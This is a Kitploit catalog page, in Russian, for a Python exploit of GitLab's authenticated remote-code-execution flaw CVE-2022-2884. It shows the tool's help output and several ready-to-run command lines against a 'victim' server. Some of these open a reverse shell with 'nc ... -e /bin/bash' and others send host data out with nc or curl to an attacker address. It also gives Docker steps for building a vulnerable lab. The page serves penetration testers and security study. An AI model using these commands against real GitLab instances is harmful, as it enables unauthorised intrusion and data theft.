Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
gitlab_rce_cve-2022-2884 — Эксплуатирует аутентифицированную RCE-уязвимость GitLab, известную как CVE-2022-2884. | Kitploit
Инструменты/GitHubGitHub/m3ssap0/gitlab_rce_cve-2022-2884
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubm3ssap0/gitlab_rce_cve-2022-2884

gitlab_rce_cve-2022-2884

Эксплуатирует аутентифицированную RCE-уязвимость GitLab, известную как CVE-2022-2884.

Репозиторий
26633 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

gitlab_rce_cve-2022-2884

Это программа на Python3, которая эксплуатирует аутентифицированную RCE-уязвимость GitLab, известную как CVE-2022-2884.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот инструмент предназначен для специалистов по безопасности и AppSec для проведения оценок безопасности. Пожалуйста, используйте его ответственно. Я не несу ответственности за то, как кто-либо использует это приложение. Я НЕ несу ответственности за любой ущерб, причинённый, или любые преступления, совершённые с помощью этого инструмента.

Информация об уязвимости

  • CVE-ID: CVE-2022-2884
  • Ссылка: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884
  • Описание: Уязвимость в GitLab CE/EE, затрагивающая все версии с 11.3.4 до 15.1.5, с 15.2 по 15.2.3, с 15.3 по 15.3.1, позволяет аутентифицированному пользователю выполнить удалённый код через конечную точку API Import from GitHub.
  • Ссылка производителя: https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/

Справка

root@kitploit:~
$ ./gitlab_rce_cve-2022-2884.py --help
usage: gitlab_rce_cve-2022-2884.py [-h] -u URL -pt PRIVATE_TOKEN [-tn TARGET_NAMESPACE] -a ADDRESS [-p PORT] [-s] -c COMMAND [-d DELAY] [-v]

Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - v1.0 (2022-12-25)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of the victim GitLab
  -pt PRIVATE_TOKEN, --private-token PRIVATE_TOKEN
                        private token of GitLab
  -tn TARGET_NAMESPACE, --target-namespace TARGET_NAMESPACE
                        target namespace of GitLab (default is 'root')
  -a ADDRESS, --address ADDRESS
                        IP address of the attacker machine
  -p PORT, --port PORT  TCP port of the attacker machine (default is 1337)
  -s, --https           set if the attacker machine is exposed via HTTPS
  -c COMMAND, --command COMMAND
                        the command to execute
  -d DELAY, --delay DELAY
                        seconds of delay to wait for the exploit to complete
  -v, --verbose         verbose mode

Примеры

root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "id | nc 1.2.3.4 6669"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "(hostname; ps aux) | curl 1.2.3.4:6669 -X POST --data-binary @- "
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "echo 'test' > /tmp/test"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" -d 180
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -v -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -p 1337 -c "nc 1.2.3.4 6669 -e /bin/bash"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -tn root -a 1.2.3.4 -p 1337 -s -c "nc 1.2.3.4 6669 -e /bin/bash"

Уязвимое приложение

Уязвимое приложение можно настроить с помощью следующих команд.

root@kitploit:~
export GITLAB_HOME=/srv/gitlab
docker run --detach --rm \
           --hostname gitlab.example.com \
           --publish 443:443 --publish 80:80 --publish 22:22 \
           --name vuln-gitlab \
           --volume $GITLAB_HOME/config:/etc/gitlab \
           --volume $GITLAB_HOME/logs:/var/log/gitlab \
           --volume $GITLAB_HOME/data:/var/opt/gitlab \
           --shm-size 256m \
           gitlab/gitlab-ce:15.3.0-ce.0

Возможно, пройдёт некоторое время, прежде чем контейнер Docker начнёт отвечать на запросы. Затем подключитесь к http://localhost.

Войдите с именем пользователя root и паролем из следующей команды.

root@kitploit:~
docker exec -it vuln-gitlab grep 'Password:' /etc/gitlab/initial_root_password

Чтобы протестировать эксплойт локально, необходимо добавить --network="host" к команде docker run и снять ограничения для исходящих запросов в GitLab:

  • перейдите на http://localhost/admin/application_settings/network;
  • разверните раздел "Outbound requests";
  • отметьте "Allow requests to the local network from web hooks and services";
  • добавьте 127.0.0.1 в текстовое поле "Local IP addresses and domain names that hooks and services may access";
  • сохраните изменения.

Необходимым условием для работы эксплойта является наличие приватного токена в GitLab:

  • перейдите на http://localhost/-/profile/personal_access_tokens;
  • сгенерируйте токен с областью действия как минимум api.

Авторы

  • Antonio Francesco Sardella - основная реализация - m3ssap0

Лицензия

Подробности см. в файле LICENSE.

Благодарности

  • yvvdwf, исследователь безопасности, обнаруживший уязвимость.
Скачать инструмент